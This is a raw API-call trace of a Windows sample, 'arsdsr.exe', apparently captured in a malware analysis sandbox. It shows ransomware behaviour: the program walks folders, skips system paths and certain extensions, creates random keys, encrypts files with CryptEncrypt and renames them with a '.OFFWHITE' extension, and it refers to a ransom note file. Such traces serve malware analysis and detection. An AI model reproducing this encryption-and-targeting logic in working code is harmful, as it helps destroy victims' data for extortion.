lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*" [0146.622] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0146.623] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.623] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0146.623] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.623] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.623] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0146.623] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0146.623] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="Temp", cAlternateFileName="")) returned 0 [0146.623] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.623] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Data", cAlternateFileName="")) returned 0 [0146.623] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.623] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2=".") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="..") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="...") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="windows") returned -1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="$recycle.bin") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="rsa") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="ntuser.dat") returned 1 [0146.623] lstrcmpiW (lpString1="User Account Pictures", lpString2="programdata") returned 1 [0146.624] lstrcmpiW (lpString1="User Account Pictures", lpString2="appdata") returned 1 [0146.624] lstrcmpiW (lpString1="User Account Pictures", lpString2="program files") returned 1 [0146.624] lstrcmpiW (lpString1="User Account Pictures", lpString2="program files (x86)") returned 1 [0146.624] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.624] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="User Account Pictures" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures" [0146.624] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.624] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.624] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0146.624] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="5p5NrGJn0jS HALPmcxz.dat", cAlternateFileName="5P5NRG~1.DAT")) returned 1 [0146.636] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2=".") returned 1 [0146.636] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="..") returned 1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="...") returned 1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="windows") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="$recycle.bin") returned 1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="rsa") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="ntuser.dat") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="programdata") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="appdata") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="program files") returned -1 [0146.637] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="program files (x86)") returned -1 [0146.637] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.637] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="5p5NrGJn0jS HALPmcxz.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" [0146.637] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.637] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.637] PathFindExtensionW (pszPath="5p5NrGJn0jS HALPmcxz.dat") returned=".dat" [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0146.637] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0146.638] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0146.638] GetProcessHeap () returned 0x500000 [0146.638] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f98 [0146.645] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0146.647] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=0) returned 1 [0146.647] GetProcessHeap () returned 0x500000 [0146.647] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ae8 [0146.647] GetProcessHeap () returned 0x500000 [0146.647] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b00 [0146.647] GetProcessHeap () returned 0x500000 [0146.647] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5607e0 [0146.647] GetProcessHeap () returned 0x500000 [0146.648] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5608e8 [0146.648] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.650] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.651] SystemFunction036 (in: RandomBuffer=0x546ae8, RandomBufferLength=0x10 | out: RandomBuffer=0x546ae8) returned 1 [0146.651] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.651] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.651] SystemFunction036 (in: RandomBuffer=0x546b00, RandomBufferLength=0x10 | out: RandomBuffer=0x546b00) returned 1 [0146.651] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.651] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.651] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5607e0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5607e0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0146.652] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.652] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.652] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5608e8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5608e8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0146.659] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.659] SetLastError (dwErrCode=0x0) [0146.659] WriteFile (in: hFile=0x21c, lpBuffer=0x5607e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607e0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.672] GetLastError () returned 0x0 [0146.672] GetLastError () returned 0x0 [0146.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.672] WriteFile (in: hFile=0x21c, lpBuffer=0x5608e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5608e8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.673] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.673] WriteFile (in: hFile=0x21c, lpBuffer=0x546f98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x546f98*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0146.673] GetProcessHeap () returned 0x500000 [0146.673] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x0) returned 0x546fa8 [0146.673] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x21c, lpBuffer=0x546fa8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x546fa8*, lpNumberOfBytesRead=0x295dec0*=0x0, lpOverlapped=0x0) returned 1 [0146.673] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.673] WriteFile (in: hFile=0x21c, lpBuffer=0x546fa8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x546fa8*, lpNumberOfBytesWritten=0x295decc*=0x0, lpOverlapped=0x0) returned 1 [0146.673] GetProcessHeap () returned 0x500000 [0146.673] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546fa8 | out: hHeap=0x500000) returned 1 [0146.673] CloseHandle (hObject=0x21c) returned 1 [0146.673] GetProcessHeap () returned 0x500000 [0146.673] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607e0 | out: hHeap=0x500000) returned 1 [0146.673] GetProcessHeap () returned 0x500000 [0146.673] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5608e8 | out: hHeap=0x500000) returned 1 [0146.673] GetProcessHeap () returned 0x500000 [0146.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546ae8 | out: hHeap=0x500000) returned 1 [0146.674] GetProcessHeap () returned 0x500000 [0146.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546b00 | out: hHeap=0x500000) returned 1 [0146.674] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" [0146.674] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.OFFWHITE" [0146.674] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), lpNewFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.offwhite")) returned 1 [0146.676] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2=".") returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="..") returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="...") returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="windows") returned -1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="$recycle.bin") returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="rsa") returned -1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="ntuser.dat") returned -1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="programdata") returned -1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="appdata") returned 1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="program files") returned -1 [0146.676] lstrcmpiW (lpString1="Default Pictures", lpString2="program files (x86)") returned -1 [0146.676] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.676] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Default Pictures" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0146.676] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.676] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.676] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0146.676] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.681] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.681] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="..", cAlternateFileName="")) returned 1 [0146.681] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.681] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.681] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="..") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="...") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="windows") returned -1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="$recycle.bin") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="rsa") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="ntuser.dat") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="programdata") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="appdata") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="program files") returned 1 [0146.681] lstrcmpiW (lpString1="usertile10.bmp", lpString2="program files (x86)") returned 1 [0146.681] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.681] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile10.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" [0146.681] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.681] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.681] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.681] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.682] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.682] lstrcmpiW (lpString1="usertile10.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.682] GetProcessHeap () returned 0x500000 [0146.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546fa8 [0146.682] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.684] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.684] GetProcessHeap () returned 0x500000 [0146.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b00 [0146.685] GetProcessHeap () returned 0x500000 [0146.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ae8 [0146.685] GetProcessHeap () returned 0x500000 [0146.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5607e0 [0146.685] GetProcessHeap () returned 0x500000 [0146.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5608e8 [0146.685] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 